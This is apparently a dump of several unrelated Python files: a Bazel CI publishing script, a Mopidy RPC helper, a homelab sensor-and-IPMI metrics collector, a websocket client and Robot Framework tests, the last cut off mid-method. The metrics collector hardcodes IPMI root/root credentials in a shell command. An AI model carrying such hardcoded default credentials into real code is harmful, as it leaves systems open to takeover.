return "gs://{}/metadata/{}.json".format(bucket_name, git_commit)
def bazelci_last_green_commit_url(git_repository, pipeline_slug):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-untrusted-builds"
return "gs://{}/last_green_commit/{}/{}".format(
bucket_name, git_repository[len("https://") :], pipeline_slug
)
def bazelci_last_green_downstream_commit_url():
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-untrusted-builds"
return "gs://{}/last_green_commit/downstream_pipeline".format(bucket_name)
def get_last_green_commit(last_green_commit_url):
try:
return (
subprocess.check_output(
[gsutil_command(), "cat", last_green_commit_url], env=os.environ
)
.decode("utf-8")
.strip()
)
except subprocess.CalledProcessError:
return None
def try_update_last_green_commit():
org_slug = os.getenv("BUILDKITE_ORGANIZATION_SLUG")
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
current_job_id = os.getenv("BUILDKITE_JOB_ID")
client = BuildkiteClient(org=org_slug, pipeline=pipeline_slug)
build_info = client.get_build_info(build_number)
    # Find failing steps, ignoring Buildifier, soft-failed steps and the current step
    # itself, before trying to update the last green commit.
def has_failed(job):
state = job.get("state")
# Ignore steps that don't have a state (like "wait").
return (
state is not None
and state != "passed"
and not job.get("soft_failed")
and job["id"] != current_job_id
and job["name"] != BUILDIFIER_STEP_NAME
)
failing_jobs = [j["name"] for j in build_info["jobs"] if has_failed(j)]
if failing_jobs:
raise BuildkiteException(
"Cannot update last green commit due to {} failing step(s): {}".format(
len(failing_jobs), ", ".join(failing_jobs)
)
)
git_repository = os.getenv("BUILDKITE_REPO")
last_green_commit_url = bazelci_last_green_commit_url(git_repository, pipeline_slug)
update_last_green_commit_if_newer(last_green_commit_url)
def update_last_green_commit_if_newer(last_green_commit_url):
last_green_commit = get_last_green_commit(last_green_commit_url)
current_commit = subprocess.check_output(["git", "rev-parse", "HEAD"]).decode("utf-8").strip()
if last_green_commit:
success = False
try:
execute_command(["git", "fetch", "-v", "origin", last_green_commit])
success = True
        except subprocess.CalledProcessError:
            # If fetching the commit fails, it typically means that the commit does not
            # exist anymore (e.g. due to a force push). To recover from that, we assume
            # that the current commit is the newest commit.
            result = [current_commit]
        finally:
            if success:
                result = (
                    subprocess.check_output(
                        ["git", "rev-list", "%s..%s" % (last_green_commit, current_commit)]
                    )
                    .decode("utf-8")
                    .strip()
                )
    # If current_commit is newer than last_green_commit, `git rev-list A..B` will output the
    # commits in between; otherwise the output is empty.
if not last_green_commit or result:
execute_command(
[
"echo %s | %s -h 'Cache-Control: no-store' cp - %s"
% (current_commit, gsutil_command(), last_green_commit_url)
],
shell=True,
)
else:
        eprint(
            "Skipping update: last green commit (%s) is not older than current commit (%s)."
            % (last_green_commit, current_commit)
        )
def try_update_last_green_downstream_commit():
last_green_commit_url = bazelci_last_green_downstream_commit_url()
update_last_green_commit_if_newer(last_green_commit_url)
def latest_generation_and_build_number():
generation = None
output = None
for attempt in range(5):
output = subprocess.check_output(
[gsutil_command(), "stat", bazelci_latest_build_metadata_url()], env=os.environ
)
match = re.search("Generation:[ ]*([0-9]+)", output.decode("utf-8"))
if not match:
raise BuildkiteException("Couldn't parse generation. gsutil output format changed?")
generation = match.group(1)
match = re.search(r"Hash \(md5\):[ ]*([^\s]+)", output.decode("utf-8"))
if not match:
raise BuildkiteException("Couldn't parse md5 hash. gsutil output format changed?")
expected_md5hash = base64.b64decode(match.group(1))
output = subprocess.check_output(
[gsutil_command(), "cat", bazelci_latest_build_metadata_url()], env=os.environ
)
hasher = hashlib.md5()
hasher.update(output)
actual_md5hash = hasher.digest()
if expected_md5hash == actual_md5hash:
break
info = json.loads(output.decode("utf-8"))
return generation, info["build_number"]
def sha256_hexdigest(filename):
sha256 = hashlib.sha256()
with open(filename, "rb") as f:
for block in iter(lambda: f.read(65536), b""):
sha256.update(block)
return sha256.hexdigest()
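# Illustrative usage sketch (hypothetical helper, for clarity only): hashes a small
# temporary file with sha256_hexdigest. Because the helper streams the file in
# 64 KiB blocks, the same call works for large Bazel binaries without loading them
# fully into memory.
def _example_sha256_hexdigest():
    import tempfile
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b"bazel")
        path = f.name
    try:
        return sha256_hexdigest(path)
    finally:
        os.remove(path)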
def upload_bazel_binaries():
"""
Uploads all Bazel binaries to a deterministic URL based on the current Git commit.
Returns maps of platform names to sha256 hashes of the corresponding bazel and bazel_nojdk binaries.
"""
bazel_hashes = {}
bazel_nojdk_hashes = {}
for platform_name, platform in PLATFORMS.items():
if not should_publish_binaries_for_platform(platform_name):
continue
tmpdir = tempfile.mkdtemp()
try:
bazel_binary_path = download_bazel_binary(tmpdir, platform_name)
# One platform that we build on can generate binaries for multiple platforms, e.g.
# the centos7 platform generates binaries for the "centos7" platform, but also
# for the generic "linux" platform.
for target_platform_name in platform["publish_binary"]:
execute_command(
[
gsutil_command(),
"cp",
bazel_binary_path,
bazelci_builds_gs_url(target_platform_name, os.environ["BUILDKITE_COMMIT"]),
]
)
bazel_hashes[target_platform_name] = sha256_hexdigest(bazel_binary_path)
# Also publish bazel_nojdk binaries.
bazel_nojdk_binary_path = download_bazel_nojdk_binary(tmpdir, platform_name)
for target_platform_name in platform["publish_binary"]:
execute_command(
[
gsutil_command(),
"cp",
bazel_nojdk_binary_path,
bazelci_builds_nojdk_gs_url(
target_platform_name, os.environ["BUILDKITE_COMMIT"]
),
]
)
bazel_nojdk_hashes[target_platform_name] = sha256_hexdigest(bazel_nojdk_binary_path)
except subprocess.CalledProcessError as e:
            # If we're not on the main branch, we're probably building a custom one-off
            # binary, so we ignore failures for individual platforms (it's possible that
            # we didn't build binaries for all platforms).
if not current_branch_is_main_branch():
eprint(
"Ignoring failure to download and publish Bazel binary for platform {}: {}".format(
platform_name, e
)
)
else:
raise e
finally:
shutil.rmtree(tmpdir)
return bazel_hashes, bazel_nojdk_hashes
def try_publish_binaries(bazel_hashes, bazel_nojdk_hashes, build_number, expected_generation):
"""
Uploads the info.json file that contains information about the latest Bazel commit that was
successfully built on CI.
"""
now = datetime.datetime.now()
git_commit = os.environ["BUILDKITE_COMMIT"]
info = {
"build_number": build_number,
"build_time": now.strftime("%d-%m-%Y %H:%M"),
"git_commit": git_commit,
"platforms": {},
}
for platform, sha256 in bazel_hashes.items():
info["platforms"][platform] = {
"url": bazelci_builds_download_url(platform, git_commit),
"sha256": sha256,
"nojdk_url": bazelci_builds_nojdk_download_url(platform, git_commit),
"nojdk_sha256": bazel_nojdk_hashes[platform],
}
tmpdir = tempfile.mkdtemp()
try:
info_file = os.path.join(tmpdir, "info.json")
with open(info_file, mode="w", encoding="utf-8") as fp:
json.dump(info, fp, indent=2, sort_keys=True)
try:
execute_command(
[
gsutil_command(),
"-h",
"x-goog-if-generation-match:" + expected_generation,
"-h",
"Content-Type:application/json",
"cp",
info_file,
bazelci_latest_build_metadata_url(),
]
)
except subprocess.CalledProcessError:
raise BinaryUploadRaceException()
execute_command(
[
gsutil_command(),
"cp",
bazelci_latest_build_metadata_url(),
bazelci_builds_metadata_url(git_commit),
]
)
finally:
shutil.rmtree(tmpdir)
def publish_binaries():
"""
Publish Bazel binaries to GCS.
"""
current_build_number = os.environ.get("BUILDKITE_BUILD_NUMBER", None)
if not current_build_number:
raise BuildkiteException("Not running inside Buildkite")
current_build_number = int(current_build_number)
# Upload the Bazel binaries for this commit.
bazel_hashes, bazel_nojdk_hashes = upload_bazel_binaries()
# Try to update the info.json with data about our build. This will fail (expectedly) if we're
# not the latest build. Only do this if we're building binaries from the main branch to avoid
# accidentally publishing a custom debug build as the "latest" Bazel binary.
if current_branch_is_main_branch():
for _ in range(5):
latest_generation, latest_build_number = latest_generation_and_build_number()
if current_build_number <= latest_build_number:
eprint(
(
"Current build '{0}' is not newer than latest published '{1}'. "
+ "Skipping publishing of binaries."
).format(current_build_number, latest_build_number)
)
break
try:
try_publish_binaries(
bazel_hashes, bazel_nojdk_hashes, current_build_number, latest_generation
)
except BinaryUploadRaceException:
# Retry.
continue
eprint(
"Successfully updated '{0}' to binaries from build {1}.".format(
bazelci_latest_build_metadata_url(), current_build_number
)
)
break
else:
raise BuildkiteException("Could not publish binaries, ran out of attempts.")
# This is so that multiline python strings are represented as YAML
# block strings.
def str_presenter(dumper, data):
if len(data.splitlines()) > 1: # check for multiline string
return dumper.represent_scalar("tag:yaml.org,2002:str", data, style="|")
return dumper.represent_scalar("tag:yaml.org,2002:str", data)
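# Illustrative usage sketch (hypothetical helper, for clarity only): once
# str_presenter is registered (as done in main() below via yaml.add_representer),
# multiline strings such as pipeline commands are dumped as YAML block scalars ("|")
# instead of quoted strings with embedded "\n" escapes.
def _example_yaml_block_scalar():
    yaml.add_representer(str, str_presenter)
    step = {"command": "echo first line\necho second line"}
    return yaml.dump(step, default_flow_style=False)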
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
yaml.add_representer(str, str_presenter)
parser = argparse.ArgumentParser(description="Bazel Continuous Integration Script")
parser.add_argument("--script", type=str)
subparsers = parser.add_subparsers(dest="subparsers_name")
bazel_publish_binaries_pipeline = subparsers.add_parser("bazel_publish_binaries_pipeline")
bazel_publish_binaries_pipeline.add_argument("--file_config", type=str)
bazel_publish_binaries_pipeline.add_argument("--http_config", type=str)
bazel_publish_binaries_pipeline.add_argument("--git_repository", type=str)
bazel_downstream_pipeline = subparsers.add_parser("bazel_downstream_pipeline")
bazel_downstream_pipeline.add_argument("--file_config", type=str)
bazel_downstream_pipeline.add_argument("--http_config", type=str)
bazel_downstream_pipeline.add_argument("--git_repository", type=str)
bazel_downstream_pipeline.add_argument(
"--test_incompatible_flags", type=bool, nargs="?", const=True
)
bazel_downstream_pipeline.add_argument(
"--test_disabled_projects", type=bool, nargs="?", const=True
)
bazel_downstream_pipeline.add_argument("--notify", type=bool, nargs="?", const=True)
project_pipeline = subparsers.add_parser("project_pipeline")
project_pipeline.add_argument("--project_name", type=str)
project_pipeline.add_argument("--file_config", type=str)
project_pipeline.add_argument("--http_config", type=str)
project_pipeline.add_argument("--git_repository", type=str)
project_pipeline.add_argument("--monitor_flaky_tests", type=bool, nargs="?", const=True)
project_pipeline.add_argument("--use_but", type=bool, nargs="?", const=True)
project_pipeline.add_argument("--incompatible_flag", type=str, action="append")
project_pipeline.add_argument("--notify", type=bool, nargs="?", const=True)
runner = subparsers.add_parser("runner")
runner.add_argument("--task", action="store", type=str, default="")
runner.add_argument("--file_config", type=str)
runner.add_argument("--http_config", type=str)
runner.add_argument("--git_repository", type=str)
runner.add_argument(
"--git_commit", type=str, help="Reset the git repository to this commit after cloning it"
)
runner.add_argument(
"--repo_location",
type=str,
help="Use an existing repository instead of cloning from github",
)
runner.add_argument(
"--use_bazel_at_commit", type=str, help="Use Bazel binary built at a specific commit"
)
runner.add_argument("--use_but", type=bool, nargs="?", const=True)
runner.add_argument("--save_but", type=bool, nargs="?", const=True)
runner.add_argument("--needs_clean", type=bool, nargs="?", const=True)
runner.add_argument("--build_only", type=bool, nargs="?", const=True)
runner.add_argument("--test_only", type=bool, nargs="?", const=True)
runner.add_argument("--monitor_flaky_tests", type=bool, nargs="?", const=True)
runner.add_argument("--incompatible_flag", type=str, action="append")
subparsers.add_parser("publish_binaries")
subparsers.add_parser("try_update_last_green_commit")
subparsers.add_parser("try_update_last_green_downstream_commit")
args = parser.parse_args(argv)
if args.script:
global SCRIPT_URL
SCRIPT_URL = args.script
try:
if args.subparsers_name == "bazel_publish_binaries_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_bazel_publish_binaries_pipeline(
task_configs=configs.get("tasks", None),
http_config=args.http_config,
file_config=args.file_config,
)
elif args.subparsers_name == "bazel_downstream_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_bazel_downstream_pipeline(
task_configs=configs.get("tasks", None),
http_config=args.http_config,
file_config=args.file_config,
test_incompatible_flags=args.test_incompatible_flags,
test_disabled_projects=args.test_disabled_projects,
notify=args.notify,
)
elif args.subparsers_name == "project_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_project_pipeline(
configs=configs,
project_name=args.project_name,
http_config=args.http_config,
file_config=args.file_config,
git_repository=args.git_repository,
monitor_flaky_tests=args.monitor_flaky_tests,
use_but=args.use_but,
incompatible_flags=args.incompatible_flag,
notify=args.notify,
)
elif args.subparsers_name == "runner":
configs = fetch_configs(args.http_config, args.file_config)
tasks = configs.get("tasks", {})
task_config = tasks.get(args.task)
if not task_config:
raise BuildkiteException(
"No such task '{}' in configuration. Available: {}".format(
args.task, ", ".join(tasks)
)
)
platform = get_platform_for_task(args.task, task_config)
            # The value of `BUILDKITE_MESSAGE` defaults to the commit message, which can be
            # too large on Windows, so we truncate the value to 1000 characters.
            # See https://github.com/bazelbuild/continuous-integration/issues/1218
if "BUILDKITE_MESSAGE" in os.environ:
os.environ["BUILDKITE_MESSAGE"] = os.environ["BUILDKITE_MESSAGE"][:1000]
execute_commands(
task_config=task_config,
platform=platform,
git_repository=args.git_repository,
git_commit=args.git_commit,
repo_location=args.repo_location,
use_bazel_at_commit=args.use_bazel_at_commit,
use_but=args.use_but,
save_but=args.save_but,
needs_clean=args.needs_clean,
build_only=args.build_only,
test_only=args.test_only,
monitor_flaky_tests=args.monitor_flaky_tests,
incompatible_flags=args.incompatible_flag,
bazel_version=task_config.get("bazel") or configs.get("bazel"),
)
elif args.subparsers_name == "publish_binaries":
publish_binaries()
elif args.subparsers_name == "try_update_last_green_commit":
# Update the last green commit of a project pipeline
try_update_last_green_commit()
elif args.subparsers_name == "try_update_last_green_downstream_commit":
# Update the last green commit of the downstream pipeline
try_update_last_green_downstream_commit()
else:
parser.print_help()
return 2
except BuildkiteException as e:
eprint(str(e))
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
|
utils.py
|
import json
import requests
def run_async(func):
"""Function decorator intended to make "func" run in a separate thread
(asynchronously).
:param func: the function to run asynchronously
:return: the created Thread object that the function is running in.
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
"""Run a function asynchronously
:param args: all arguments will be passed to the target function
:param kwargs: pass a Queue.Queue() object with the optional 'queue'
keyword if you would like to retrieve the results after the thread
has run. All other keyword arguments will be passed to the target
function.
:return: the created Thread object that the function is running in.
"""
t = Thread(target=func, args=args, kwargs=kwargs)
queue = kwargs.get("queue", None)
if queue is not None:
t.result_queue = queue
t.start()
return t
return async_func
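# Illustrative usage sketch (hypothetical helper, for clarity only): shows how a
# result can be retrieved from a run_async-decorated function through the optional
# 'queue' keyword argument.
def _example_run_async_usage():
    from queue import Queue

    @run_async
    def double(value, queue=None):
        queue.put(value * 2)

    results = Queue()
    thread = double(21, queue=results)
    thread.join()
    return results.get()  # -> 42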
def format_proxy(proxy_config):
if not proxy_config.get("hostname"):
return None
port = proxy_config.get("port")
if not port or port < 0:
port = 80
template = "{hostname}:{port}"
return template.format(hostname=proxy_config["hostname"], port=port)
class RPCClient:
hostname = "127.0.0.1"
port = "6680"
url = "http://" + str(hostname) + ":" + str(port) + "/mopidy/rpc"
id = 0
@classmethod
    def configure(cls, hostname, port):
        cls.hostname = hostname
        cls.port = port
        # Rebuild the endpoint URL so subsequent RPC calls target the new host/port.
        cls.url = "http://{}:{}/mopidy/rpc".format(hostname, port)
@classmethod
@run_async
def _do_rpc(cls, method, params=None, queue=None):
"""Makes an asynchronously remote procedure call to the Mopidy server.
:param method: the name of the Mopidy remote procedure to be called
(typically from the 'core' module.
:param params: a dictionary of argument:value pairs to be passed
directly to the remote procedure.
:param queue: a Queue.Queue() object that the results of the thread
should be stored in.
"""
cls.id += 1
data = {"method": method, "jsonrpc": "2.0", "id": cls.id}
if params is not None:
data["params"] = params
json_data = json.loads(
requests.request(
"POST",
cls.url,
data=json.dumps(data),
headers={"Content-Type": "application/json"},
).text
)
if queue is not None:
queue.put(json_data["result"])
|
humidity.py
|
#! /usr/bin/python3
import logging
import multiprocessing
from concurrent.futures.thread import ThreadPoolExecutor
from multiprocessing import Process
import statsd
import Adafruit_DHT
import time
import boto3
import sys
import subprocess
import os
from timeit import default_timer as timer
from threading import Thread
from threading import Lock
from queue import Queue
from dotenv import load_dotenv
load_dotenv()
DHT_PIN = 4
STATSD_ENDPOINT = os.environ['statsd_url']
statsd = statsd.StatsClient(STATSD_ENDPOINT, 8125, prefix='totomz.homelab')
skip_ipmi = dict()
q = Queue()
HOSTS = {
'zione': {'ipmi': False},
'ziobob': {'ipmi': '192.168.10.30', 'lock': Lock()},
'ziocharlie': {'ipmi': '192.168.10.31', 'lock': Lock()},
}
vgpulock = Lock()
sensorlock = Lock()
def str2float(string, default=0.0):
res = default
try:
res = float(string)
except Exception:
res = default
return res
def collect_sensor():
    log = multiprocessing.get_logger()
    log.info(" --> Collecting temperature and humidity")
    global q
    lock = sensorlock.acquire(blocking=False)
    if lock is False:
        log.info(" --> Collecting sensors :: still being queried....skipping")
        return
    humidity, temperature = None, None
    try:
        humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, DHT_PIN)
        # humidity, temperature = 0, 1
    finally:
        sensorlock.release()
    if humidity is None or temperature is None:
        log.warning(" --> Sensor read failed, skipping this cycle")
        return
    results = dict()
    results['rack.humidity'] = humidity
    results['rack.temperature'] = temperature
    log.info(f" --> Temperature: {temperature} Humidity: {humidity}")
    q.put(results)
def collect_ipmi():
log = multiprocessing.get_logger()
global q
results = dict()
log.info(" --> Collecting ipmi")
def ipmi_poll(hostname):
if skip_ipmi.get(hostname, 0) > 0:
print(f"Host {hostname} is in the skipped list")
skip_ipmi[hostname] = skip_ipmi.get(hostname, 0) - 1
return results
lock = HOSTS[hostname]['lock'].acquire(blocking=False)
if lock is False:
log.info(f" --> Collecting ipmi :: {hostname} still being queried....skipping")
return
try:
log.info(f" --> Collecting ipmi :: {hostname} querying")
out = subprocess.check_output("ipmitool -P root -U root -H {ip} sensor".format(ip=HOSTS[hostname]['ipmi']),
stderr=subprocess.STDOUT,
shell=True)
stdout = str(out.decode('utf-8'))
log.info(f" --> Collecting ipmi :: {hostname} got readings")
metrics = stdout.split("\n")
for line in metrics:
metric_line = line.lower()
if "temp" not in metric_line:
continue
p = metric_line.split("|")
metric_name = f"host.{hostname}.{str.lower(str.strip(str.strip(p[0]))).replace(' ', '_')}"
metric_value = str2float(str.strip(p[1]), 0)
results[metric_name] = metric_value
        except Exception as e:
            step = 5
            print(f"Error processing IPMI for {hostname}: {e} - skipping it for {step} cycles")
            skip_ipmi[hostname] = step
finally:
HOSTS[hostname]['lock'].release()
with ThreadPoolExecutor(max_workers=2) as pool:
pool.map(ipmi_poll, ['ziobob', 'ziocharlie'])
log.info(" --> Collecting ipmi done")
if len(results) > 0:
q.put(results)
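# Illustrative sketch (hypothetical helper, for clarity only): shows the pipe-separated
# `ipmitool ... sensor` line format that ipmi_poll above parses; only rows whose name
# contains "temp" are turned into metrics. The sample line is made up.
def _example_parse_ipmi_line(hostname="ziobob"):
    line = "CPU Temp         | 42.000     | degrees C  | ok"
    p = line.lower().split("|")
    metric_name = f"host.{hostname}.{p[0].strip().replace(' ', '_')}"
    metric_value = str2float(p[1].strip(), 0)
    return metric_name, metric_value  # ("host.ziobob.cpu_temp", 42.0)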
def collect_vgpu():
log = multiprocessing.get_logger()
global q
global vgpulock
hostname = "zione"
log.info(" --> Collecting vGPU")
results = dict()
lock = vgpulock.acquire(blocking=False)
if lock is False:
log.info(f" --> Collecting vGPU :: still being queried....skipping")
return
try:
out = subprocess.check_output(f"ssh root@{hostname} \"nvidia-smi -q\"",
stderr=subprocess.STDOUT,
shell=True)
stdout = str(out.decode('utf-8'))
    except Exception as e:
        log.error(f"Error collecting vGPU metrics: {e}")
        return
    finally:
        vgpulock.release()
lines = stdout.split("\n")
current_gpu = None
def pop_metric(name_prefix):
m = lines.pop(0).lower().split(":")
metric_name = f"{name_prefix}.{m[0].strip().replace(' ', '_')}"
metric_value = m[1].split()[0].strip()
results[f"host.zione.gpu.{metric_name}"] = str2float(metric_value)
while len(lines):
line = lines.pop(0)
if line.startswith('GPU 0000:'):
current_gpu = line.split('GPU ')[1].split(':')[1]
if current_gpu is None:
continue
if line.startswith(" FB Memory Usage"):
pop_metric(f"{current_gpu}.memory.framebuffer") # total
pop_metric(f"{current_gpu}.memory.framebuffer") # used
pop_metric(f"{current_gpu}.memory.framebuffer") # free
if line.startswith(" BAR1 Memory Usage"):
pop_metric(f"{current_gpu}.memory.bar") # total
pop_metric(f"{current_gpu}.memory.bar") # used
pop_metric(f"{current_gpu}.memory.bar") # free
line = lines.pop(0)
if line.startswith(" Utilization"):
pop_metric(f"{current_gpu}.utilization") # gpu
pop_metric(f"{current_gpu}.utilization") # memory
pop_metric(f"{current_gpu}.utilization") # encoder
pop_metric(f"{current_gpu}.utilization") # decoder
line = lines.pop(0)
if line.startswith(" Temperature"):
pop_metric(f"{current_gpu}.temp") # gpu
if line.startswith(" Power Readings"):
lines.pop(0) # Skip Power Management
pop_metric(f"{current_gpu}.power") # Draw
if line == " Clocks":
pop_metric(f"{current_gpu}.power") # Graphics
pop_metric(f"{current_gpu}.power") # SM
pop_metric(f"{current_gpu}.power") # Memory
pop_metric(f"{current_gpu}.power") # Video
log.info(f" --> Collecting vGPU :: {len(results)}")
if len(results) > 0:
q.put(results)
def statsd_writer():
log = multiprocessing.get_logger()
global q
while True:
log.info("Waiting for metrics")
metrics = q.get(block=True)
for k in metrics:
log.info(f":statsd {k} ==> {metrics[k]}")
statsd.gauge(k, metrics[k])
log.info(f"--> Bobmaaaa {len(metrics)}")
print("Starting temperature and humidity monitoring service....")
sys.stdout.flush()
if __name__ == '__main__':
log = multiprocessing.get_logger()
log.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter(' --> [%(asctime)s] - %(processName)s - %(message)s'))
log.addHandler(handler)
log.info("# Starting statsd writer")
worker = Thread(target=statsd_writer)
worker.daemon = True # Die with your parent
worker.start()
while True:
log.info("# waking up workers")
for func in [
collect_vgpu,
collect_ipmi,
collect_sensor
]:
worker = Thread(target=func)
worker.daemon = True # Die with your parent
worker.start()
time.sleep(5)
|
non_block_client.py
|
import websocket
import threading
from time import sleep
def on_message(ws, message):
print(message)
def on_close(ws):
print("closed")
if __name__ == "__main__":
websocket.enableTrace(True)
    ws = websocket.WebSocketApp("ws://localhost:9001", on_message=on_message, on_close=on_close)
wst = threading.Thread(target=ws.run_forever)
wst.daemon = True
wst.start()
conn_timeout = 5
    while not (ws.sock and ws.sock.connected) and conn_timeout:
sleep(1)
conn_timeout -= 1
msg_counter = 0
    while ws.sock and ws.sock.connected:
#ws.send('Hello world %d'%msg_counter)
sleep(1)
msg_counter += 1
|
test_run_and_rebot.py
|
import unittest
import time
import glob
import sys
import threading
import tempfile
import signal
import logging
from os.path import abspath, dirname, join, exists, curdir
from os import chdir
from robot import run, rebot
from robot.model import SuiteVisitor
from robot.running import namespace
from robot.utils import StringIO
from robot.utils.asserts import assert_equal, assert_true
from resources.runningtestcase import RunningTestCase
from resources.Listener import Listener
ROOT = dirname(dirname(dirname(abspath(__file__))))
TEMP = tempfile.gettempdir()
OUTPUT_PATH = join(TEMP, 'output.xml')
REPORT_PATH = join(TEMP, 'report.html')
LOG_PATH = join(TEMP, 'log.html')
LOG = 'Log: %s' % LOG_PATH
def run_without_outputs(*args, **kwargs):
kwargs.update(output='NONE', log='NoNe', report=None)
return run(*args, **kwargs)
class StreamWithOnlyWriteAndFlush(object):
def __init__(self):
self._buffer = []
def write(self, msg):
self._buffer.append(msg)
def flush(self):
pass
def getvalue(self):
return ''.join(self._buffer)
class TestRun(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
warn = join(ROOT, 'atest', 'testdata', 'misc', 'warnings_and_errors.robot')
nonex = join(TEMP, 'non-existing-file-this-is.robot')
remove_files = [LOG_PATH, REPORT_PATH, OUTPUT_PATH]
def test_run_once(self):
assert_equal(run(self.data, outputdir=TEMP, report='none'), 1)
self._assert_outputs([('Pass And Fail', 2), (LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(run_without_outputs(self.data, critical='nomatch'), 0)
assert_equal(run_without_outputs(self.data, name='New Name'), 1)
self._assert_outputs([('Pass And Fail', 2), ('New Name', 2), (LOG, 0)])
def test_run_fail(self):
assert_equal(run(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[('Pass And Fail', 2), (LOG, 1)])
def test_run_error(self):
assert_equal(run(self.nonex), 252)
self._assert_outputs(stderr=[('[ ERROR ]', 1), (self.nonex, 1),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(run_without_outputs(self.data, stdout=stdout), 1)
self._assert_output(stdout, [('Pass And Fail', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_custom_stderr(self):
stderr = StringIO()
assert_equal(run_without_outputs(self.warn, stderr=stderr), 0)
self._assert_output(stderr, [('[ WARN ]', 4), ('[ ERROR ]', 2)])
self._assert_outputs([('Warnings And Errors', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(run_without_outputs(self.warn, stdout=output, stderr=output), 0)
self._assert_output(output, [('[ WARN ]', 4), ('[ ERROR ]', 2),
('Warnings And Errors', 3), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_multi_options_as_single_string(self):
assert_equal(run_without_outputs(self.data, exclude='fail'), 0)
self._assert_outputs([('FAIL', 0)])
def test_listener_gets_notification_about_log_report_and_output(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run(self.data, output=OUTPUT_PATH, report=REPORT_PATH,
log=LOG_PATH, listener=listener), 1)
self._assert_outputs(stdout=[('[output {0}]'.format(OUTPUT_PATH), 1),
('[report {0}]'.format(REPORT_PATH), 1),
('[log {0}]'.format(LOG_PATH), 1),
('[listener close]', 1)])
def test_pass_listener_as_instance(self):
assert_equal(run_without_outputs(self.data, listener=Listener(1)), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_string(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=module_file+":1"), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_list(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=[module_file+":1", Listener(2)]), 1)
self._assert_outputs([("[from listener 1]", 1), ("[from listener 2]", 1)])
def test_pre_run_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def start_suite(self, suite):
suite.tests = [t for t in suite.tests if t.tags.match('pass')]
assert_equal(run_without_outputs(self.data, prerunmodifier=Modifier()), 0)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 0)])
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
modifier = Modifier()
assert_equal(run(self.data, outputdir=TEMP, log=LOG_PATH, prerebotmodifier=modifier), 1)
assert_equal(modifier.tests, ['Pass', 'Fail'])
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)])
def test_invalid_modifier(self):
assert_equal(run_without_outputs(self.data, prerunmodifier=42), 1)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)],
[("[ ERROR ] Executing model modifier 'integer' "
"failed: AttributeError: ", 1)])
class TestRebot(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'rebot', 'created_normal.xml')
nonex = join(TEMP, 'non-existing-file-this-is.xml')
remove_files = [LOG_PATH, REPORT_PATH]
def test_run_once(self):
assert_equal(rebot(self.data, outputdir=TEMP, report='NONE'), 1)
self._assert_outputs([(LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(rebot(self.data, outputdir=TEMP, critical='nomatch'), 0)
assert_equal(rebot(self.data, outputdir=TEMP, name='New Name'), 1)
self._assert_outputs([(LOG, 2)])
def test_run_fails(self):
assert_equal(rebot(self.nonex), 252)
assert_equal(rebot(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[(LOG, 1)],
stderr=[('[ ERROR ]', 1), (self.nonex, (1, 2)),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(rebot(self.data, report='None', stdout=stdout,
outputdir=TEMP), 1)
self._assert_output(stdout, [('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(rebot(self.data, log='NONE', report='NONE', stdout=output,
stderr=output), 252)
assert_equal(rebot(self.data, report='NONE', stdout=output,
stderr=output, outputdir=TEMP), 1)
self._assert_output(output, [('[ ERROR ] No outputs created', 1),
('--help', 1), ('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
test.status = 'FAIL'
modifier = Modifier()
assert_equal(rebot(self.data, outputdir=TEMP,
prerebotmodifier=modifier), 3)
assert_equal(modifier.tests, ['Test 1.1', 'Test 1.2', 'Test 2.1'])
class TestStateBetweenTestRuns(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot')
def test_importer_caches_are_cleared_between_runs(self):
self._run(self.data)
lib = self._import_library()
res = self._import_resource()
self._run(self.data)
assert_true(lib is not self._import_library())
assert_true(res is not self._import_resource())
def _run(self, data, **config):
